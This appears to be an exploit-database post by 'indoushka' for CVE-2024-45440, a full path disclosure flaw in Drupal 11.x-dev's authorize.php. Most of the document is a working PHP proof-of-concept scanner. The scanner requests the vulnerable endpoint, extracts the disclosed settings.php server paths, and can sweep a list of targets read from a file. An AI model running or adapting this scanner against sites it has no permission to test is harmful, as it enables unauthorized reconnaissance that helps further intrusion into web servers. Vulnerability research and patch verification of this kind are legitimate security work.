Share
## https://sploitus.com/exploit?id=PACKETSTORM:212771
=============================================================================================================================================
    | # Title     : Drupal 11.x-dev full Information Disclosure                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.drupal.org/project/drupal/releases/11.x-dev                                                                     |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/190573/ &  CVE-2024-45440
    
    [+] Summary : 
                 The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration 
    			 attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.
    			 
    [+]  POC : 
    
    php poc.php  or http://127.0.0.1/poc.php 
    
    <?php
    /*
     * Drupal 11.x-dev Full Path Disclosure
     * CVE-2024-45440
     * PHP Implementation
     */
    
    class DrupalPathDisclosure {
        private $timeout = 10;
        private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';
        
        public function scan_single($url) {
            echo "[*] Scanning: $url\n";
            
            if (!str_starts_with($url, 'http')) {
                $url = 'http://' . $url;
            }
            
            $full_url = $url . '/core/authorize.php';
            
            try {
                $ch = curl_init();
                curl_setopt_array($ch, [
                    CURLOPT_URL => $full_url,
                    CURLOPT_RETURNTRANSFER => true,
                    CURLOPT_TIMEOUT => $this->timeout,
                    CURLOPT_USERAGENT => $this->user_agent,
                    CURLOPT_FOLLOWLOCATION => false,
                    CURLOPT_SSL_VERIFYPEER => false
                ]);
                
                $response = curl_exec($ch);
                $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
                curl_close($ch);
                
                if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
                    preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);
                    
                    if (!empty($matches[1])) {
                        echo "[+] Vulnerable - Paths disclosed:\n";
                        foreach ($matches[1] as $path) {
                            echo "    $path\n";
                        }
                        return true;
                    }
                }
                
                echo "[-] Not vulnerable\n";
                return false;
                
            } catch (Exception $e) {
                echo "[-] Error: " . $e->getMessage() . "\n";
                return false;
            }
        }
        
        public function scan_multiple($file_path) {
            if (!file_exists($file_path)) {
                echo "[-] File not found: $file_path\n";
                return;
            }
            
            $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            $vulnerable = [];
            
            echo "[*] Scanning " . count($urls) . " targets...\n";
            
            foreach ($urls as $url) {
                if ($this->scan_single($url)) {
                    $vulnerable[] = $url;
                }
                echo "\n";
            }
            
            if (!empty($vulnerable)) {
                echo "[+] Summary - Vulnerable hosts:\n";
                foreach ($vulnerable as $host) {
                    echo "    $host\n";
                }
            } else {
                echo "[-] No vulnerable hosts found\n";
            }
        }
    }
    
    // CLI Interface
    if (php_sapi_name() === 'cli') {
        $scanner = new DrupalPathDisclosure();
        
        if ($argc < 2) {
            echo "Usage:\n";
            echo "  php drupal_path.php <url>          - Scan single target\n";
            echo "  php drupal_path.php -f <file>      - Scan multiple targets from file\n";
            echo "\nExamples:\n";
            echo "  php drupal_path.php example.com\n";
            echo "  php drupal_path.php -f targets.txt\n";
            exit(1);
        }
        
        if ($argv[1] === '-f' && isset($argv[2])) {
            $scanner->scan_multiple($argv[2]);
        } else {
            $scanner->scan_single($argv[1]);
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================